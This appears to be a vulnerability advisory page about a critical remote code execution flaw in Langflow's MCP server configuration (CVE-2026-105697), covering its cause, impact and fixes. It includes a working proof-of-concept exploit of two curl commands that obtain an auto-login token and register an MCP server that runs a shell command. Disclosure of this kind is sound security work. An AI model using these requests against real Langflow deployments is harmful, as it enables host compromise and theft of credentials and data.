Langflow, Remote Code Execution, CVE-2026-105697 (Critical) -DC-Oct2026-2860

Listen to this Post

Prior to version 1.10.3, Langflow suffered from a critical Remote Code Execution vulnerability within its Model Context Protocol (MCP) stdio transport implementation. The application allowed users or API clients to configure MCP servers with arbitrary commands and arguments without proper allowlists. In vulnerable versions, these inputs were directly passed and executed via a shell wrapper (bash -c), permitting any attacker who could access the MCP settings or construct workflow flows to execute arbitrary operating system commands on the host server. Because the default configuration of Langflow often enabled automatic login capabilities (LANGFLOW_AUTO_LOGIN=true), unauthenticated attackers could frequently retrieve valid tokens and interact with the endpoints directly. Consequently, malicious payloads—ranging from simple utility executions to full reverse shells—ran with the privileges of the underlying Langflow service process user the moment the application attempted to establish a connection to the configured MCP server.

DailyCVE Form:

Platform: Langflow
Version: < 1.10.3
Vulnerability : RCE
Severity: Critical
date: 2026-10-05

Prediction: 2026-10-05

What Undercode Say:

Analytics

The core weakness stems from insufficient validation and sanitization of command-line inputs combined with unsafe shell execution sinks in src/lfx/src/lfx/base/mcp/util.py. Without strict allowlists or argument checking prior to process spawning, user-supplied configuration data flowed straight into execution handlers.

Exploit: (Educational Purposes!)

TOKEN=$(curl -s http://127.0.0.1:7860/api/v1/auto_login | python3 -c 'import sys,json;print(json.load(sys.stdin)["access_token"])')
curl -s -X POST 'http://127.0.0.1:7860/api/v2/mcp/servers/testing' \
-H "Authorization: Bearer $TOKEN" \
-H 'Content-Type: application/json' \
--data-raw '{"command":"touch","args":["/tmp/pwned_langflow"]}'

Protection:

Upgrade Langflow to version 1.10.3 or higher, disable automatic login features (LANGFLOW_AUTO_LOGIN=false), and enforce strict command allowlists and interpreter hardening.

Impact:

Complete system compromise and remote code execution on the host running the Langflow process, exposing API credentials, connected data sources, and internal files to unauthorized access.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top